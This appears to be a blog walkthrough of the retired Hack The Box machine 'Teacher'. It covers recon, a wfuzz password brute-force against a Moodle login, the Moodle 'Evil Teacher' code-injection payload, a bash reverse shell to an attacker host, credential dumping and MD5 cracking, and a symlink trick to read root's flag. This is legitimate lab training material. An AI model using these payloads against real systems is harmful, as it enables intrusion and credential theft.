Security Blog, Rants, Raves, Write-ups, and Code
Security Blog, Rants, Raves, Write-ups, and Code
Teacher
| Name: | Teacher 
|
|---|---|
| Release Date: | 01 Dec 2018 |
| Retire Date: | 20 Apr 2019 |
| OS: | Linux |
| Base Points: | Easy - Retired [0] |
| Rated Difficulty: |  |
| Radar Graph: |  |
 |
0xEA31  00 days, 04 hours, 17 mins, 00 seconds |
 |
Frizen  00 days, 05 hours, 29 mins, 16 seconds |
| Creator: | Gioo  |
| CherryTree File: | CherryTree - Remove the .txt extension |
Again, we start with nmap -sC -sV -Pn -oA ./Teacher 10.10.10.153
$ nmap -sC -sV -Pn -oA ./Teacher 10.10.10.153
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-24 10:38 EDT
Nmap scan report for 10.10.10.153
Host is up (0.064s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.68 seconds
We've got HTTP looks to be only port open running Apache 2.4.25. So, let's take a peek at just the site itself. While just manually looking around, we find a gallery page that looks to be missing an image.
If we look at the source of the page, we see that that is "/images/5.png". Curl that and we get the below information.
kali@kali:~$ curl http://10.10.10.153/images/5.png
Hi Servicedesk,
I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
Could you guys figure out what the last charachter is, or just reset it?
Thanks,
Giovanni
kali@kali:~$
While we were manually looking around, we also had gobuster running. It found a moodle directory and some other bits of fun.
$ gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.153
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.153
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/24 10:37:36 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/javascript (Status: 301)
/js (Status: 301)
/manual (Status: 301)
/moodle (Status: 301)
/phpmyadmin (Status: 403)
/server-status (Status: 403)
===============================================================
2020/08/24 10:39:47 Finished
===============================================================
So it looks like our friend Giovanni teaches Algebra. We know all but the last character. Let's build a quick list of possible combinations and then try them with wfuzz.
PASS = 'Th4C00lTheacha'
CHAR = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,<.>/@;:]}[{|`¬+=_-)#~(*&^%$£"!?\\\'"'
for c in CHAR:
print('{}{}'.format(PASS,c))
Run that with
$python3 listcreator.py > passwords.txt
and then wfuzz it with
$wfuzz -w passwords.txt --hh 440 -t 20 -d "anchor=&username=giovanni&password=FUZZ" http://10.10.10.153/moodle/login/index.php
wfuzz -w passwords.txt --hh 440 -t 20 -d "anchor=&username=giovanni&password=FUZZ" http://10.10.10.153/moodle/login/index.php
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for
more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.153/moodle/login/index.php
Total requests: 97
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000083: 303 6 L 34 W 454 Ch "Th4C00lTheacha#"
Total time: 9.017998
Processed Requests: 97
Filtered Requests: 96
Requests/sec.: 10.75626
And that with we have Giovanni's creds. giovanni:Th4C00lTheacha# So let's check around Moodle for common exploits. We find a big one in https://www.exploit-db.com/exploits/46551 and it looks like it applies Moodle 3.4.1 - Remote Code Execution. They call it Evil Teacher. It allows you to create a Quiz inside of Moodle that will generate a low-level shell back to your attacking machine. For starters, go into the Algebra Course and turn editing on in the settings menu. Then you can "Add an activity or resource" and select Quiz.
You'll need to create a "Calculated" question. To do that, after creating the Quiz select Save and Display. From there, click the Settings gear again and scroll down to Questions.
Once you are inside the Question Bank, you can select Create New Question, and then Calculated. What you enter as the required information is really irrelevant until you get to the Answer 1 Formula field. For the formula add
/*{x}{a*/`$_GET[Trigger]`/*(1)//}{a*/`$_GET[Trigger]`/*({x})//}*/
into that field and Save and Continue Editing. It should be asking to Choose Wildcard dataset properties or some such, but that's irrelevant. We are where we need to be to add a URL encoded string that should call back to our machine. Fire up Burp and capture the "returnurl" request and forward it to repeater. Here, you should add your
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
to the end of the URL and instant reverse shell.
Copy your LinEnum script into tmp and run it to see what's there. What you are looking for though, is actually in the config.php file of the Moodle CMS directory located at /var/www/html/moodle/config.php. In there, you will find MariaDB credentials.
If we use moodle, and then show tables, we will see mdl_user which has a nice set of hashes for us to use. The only one we really care about is Giovanni's.
Giovannibak:7a860966115182402ed06375cf0a22af
Which is an MD5 that we can break down to "expelled". Side note: the other hashes are in the CTB file as is the LinEnum output. Moving along, we can su to giovanni with the expelled password and grab the user flag. Onward to root!
Anti-climactic I know. Looking around again, we find a backup.sh script in the /usr/bin directory.
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;
Since this is a retired box, am I am feeling VERY lazy today, let's just worry about the Root Flag and not a root shell. We can do this with symlinks. A simple link from root to a fake root folder will work.
giovanni@teacher:~$ cd work
cd work
giovanni@teacher:~/work$ ls
ls
courses tmp
giovanni@teacher:~/work$ cd tmp
cd tmp
giovanni@teacher:~/work/tmp$ ln -s /root fakeroot
ln -s /root fakeroot
giovanni@teacher:~/work/tmp$cd fakeroot
cd fakeroot
giovanni@teacher:~/work/tmp/fakeroot$ ls
ls
root.txt
giovanni@teacher:~/work/tmp/fakeroot$ cat root.txt
cat root.txt
4f3a83b42ac7723a508b8ace7b8b1209
giovanni@teacher:~/work/tmp/fakeroot$
©2020 Phoenix Computing Solutions | Powered by Coffee, Sarcasm, and Insanity
Everything included in the site is the intellectual property of Chris Ruggieri (Neocount Phoenix) and Phoenix Computing Solutions.
This information should not be construed as legal advice. The owner can not be held liable for anything another entity does with this information.
This information is solely the opinions and experiences of myself (Chris Ruggieri) and should not be construed as endorsement of any product, service, or of illegal activity
(GET WRITTEN PERMISSION PEOPLE!!)
Any links I provide as a convenience and for informational purposes only; they do not constitute an endorsement or an approval by the owner of this site for any of the products, services or opinions of the corporation or organization or individual.
Contact the external sites for answers to questions regarding its content.
This Includes any links posted by Chris Ruggieri in any other websites, Social Media networks, Online Groups and Online sharing Websites.